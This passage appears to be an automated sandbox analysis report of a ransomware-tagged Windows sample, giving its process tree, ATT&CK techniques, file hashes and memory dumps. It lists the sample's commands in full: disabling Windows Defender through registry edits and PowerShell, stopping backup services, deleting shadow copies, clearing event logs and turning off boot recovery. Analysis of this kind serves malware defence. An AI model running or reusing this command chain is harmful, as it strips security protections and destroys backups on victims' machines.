PID 3912 wrote to memory of 4156	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	138
PID 3912 wrote to memory of 2572	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	140
PID 3912 wrote to memory of 2572	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	140
PID 3912 wrote to memory of 3308	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	142
PID 3912 wrote to memory of 3308	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	142
PID 3912 wrote to memory of 2360	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	144
PID 3912 wrote to memory of 2360	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	144
PID 3912 wrote to memory of 2908	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	146
PID 3912 wrote to memory of 2908	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	146
PID 3912 wrote to memory of 4712	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	148
PID 3912 wrote to memory of 4712	3912	a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe	148

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\a0b0432294ebbc84d306993e2e7ea91c_JaffaCakes118.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3912
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1060
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:2672
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2008
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:3168
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3592
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:4664
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "vmicvss" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5044
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "vmicvss" /y
    3⤵
    PID:1468
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1368
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:2960
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4488
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:1940
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3464
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:8
- C:\Windows\SYSTEM32\net.exe
  net.exe stop "UnistoreSvc_21a58" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3604
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UnistoreSvc_21a58" /y
    3⤵
    PID:2368
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:3528
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:4992
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:4200
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "vmicvss" start= disabled
  2⤵
  - Launches sc.exe
  PID:3108
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:4316
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:2900
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:1496
- C:\Windows\SYSTEM32\sc.exe
  sc.exe config "UnistoreSvc_21a58" start= disabled
  2⤵
  - Launches sc.exe
  PID:2376
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4832
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:436
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:4156
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:2572
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:3308
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2360
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2908
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:4712
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:2892
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:5056
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f
  2⤵
  PID:1484
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f
  2⤵
  PID:1992
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f
  2⤵
  PID:4136
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "0" /f
  2⤵
  PID:2972
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:4920
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f
  2⤵
  PID:2720
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable
  2⤵
  PID:3708
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable
  2⤵
  PID:2236
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable
  2⤵
  PID:3240
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable
  2⤵
  PID:1820
- C:\Windows\SYSTEM32\schtasks.exe
  schtasks.exe /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable
  2⤵
  PID:2404
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "Windows Defender" /f
  2⤵
  PID:3256
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "Windows Defender" /f
  2⤵
  PID:1256
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "WindowsDefender" /f
  2⤵
  PID:2940
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:4576
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:1924
- C:\Windows\SYSTEM32\reg.exe
  reg.exe delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f
  2⤵
  PID:2336
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:904
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4340
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:4144
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:2232
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  - Modifies security service
  PID:2476
- C:\Windows\SYSTEM32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:3356
- C:\Windows\SYSTEM32\vssadmin.exe
  vssadmin.exe delete shadows /all /quiet
  2⤵
  - Interacts with shadow copies
  PID:2280
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl system
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:4548
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl security
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:2372
- C:\Windows\SYSTEM32\wevtutil.exe
  wevtutil.exe cl application
  2⤵
  - Clears Windows event logs
  - Suspicious use of AdjustPrivilegeToken
  PID:4492
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe SHADOWCOPY /nointeractive
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:60
- C:\Windows\System32\Wbem\wmic.exe
  wmic.exe shadowcopy delete
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4588
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:3360
- C:\Windows\SYSTEM32\bcdedit.exe
  bcdedit.exe /set {default} recoveryenabled no
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:4956
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c "C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
  2⤵
  PID:1976
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableIOAVProtection $true
  2⤵
  PID:2052
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableIOAVProtection $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:1728
- C:\Windows\SYSTEM32\cmd.exe
  cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true
  2⤵
  PID:2192
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    powershell Set-MpPreference -DisableRealtimeMonitoring $true
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    PID:2960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1420 --field-trial-handle=2240,i,16875000905773190493,11379096115878622792,262144 --variations-seed-version /prefetch:8
1⤵
PID:4464

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Defense Evasion

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Query Registry

T1012

Lateral Movement

Collection

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Inhibit System Recovery

T1490

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d3e9c29fe44e90aae6ed30ccf799ca8

SHA1
c7974ef72264bbdf13a2793ccf1aed11bc565dce

SHA256
2360634e63e8f0b5748e2c56ebb8f4aa78e71008ea7b5c9ca1c49be03b49557d

SHA512
60c38c4367352537545d859f64b9c5cbada94240478d1d039fd27b5ecba4dc1c90051557c16d802269703b873546ead416279c0a80c6fd5e49ad361cef22596a

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_angny01p.ovc.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/1728-4-0x0000023FC0690000-0x0000023FC06B2000-memory.dmp

Filesize
136KB

Download
memory/1728-14-0x00007FFBC4EC0000-0x00007FFBC5981000-memory.dmp

Filesize
10.8MB

Download
memory/1728-16-0x0000023FC0610000-0x0000023FC0620000-memory.dmp

Filesize
64KB

Download
memory/1728-15-0x0000023FC0610000-0x0000023FC0620000-memory.dmp

Filesize
64KB

Download
memory/1728-19-0x00007FFBC4EC0000-0x00007FFBC5981000-memory.dmp

Filesize
10.8MB

Download
memory/2960-33-0x00000157B5ED0000-0x00000157B5EE0000-memory.dmp

Filesize
64KB

Download
memory/2960-34-0x00000157B5ED0000-0x00000157B5EE0000-memory.dmp

Filesize
64KB

Download
memory/2960-22-0x00000157B5ED0000-0x00000157B5EE0000-memory.dmp

Filesize
64KB

Download
memory/2960-21-0x00007FFBC4FE0000-0x00007FFBC5AA1000-memory.dmp

Filesize
10.8MB

Download
memory/2960-36-0x00007FFBC4FE0000-0x00007FFBC5AA1000-memory.dmp

Filesize
10.8MB

Download
memory/3912-2125-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-0-0x0000012062380000-0x0000012062584000-memory.dmp

Filesize
2.0MB

Download
memory/3912-801-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-938-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-1-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-2246-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-2263-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-2287-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-3574-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-5844-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-6025-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-6026-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download
memory/3912-6028-0x00007FF795F60000-0x00007FF796340000-memory.dmp

Filesize
3.9MB

Download